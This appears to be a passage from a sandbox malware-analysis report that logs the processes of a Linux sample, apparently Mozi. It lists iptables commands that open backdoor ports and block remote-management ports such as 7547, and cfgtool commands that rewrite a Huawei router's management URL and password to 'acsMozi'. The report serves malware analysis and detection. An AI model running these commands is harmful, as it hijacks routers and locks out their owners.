                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 38798 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --dport 38798 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:06
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:11
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --dport 58000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --dport 35000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --dport 50023 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --dport 7547 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:21
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
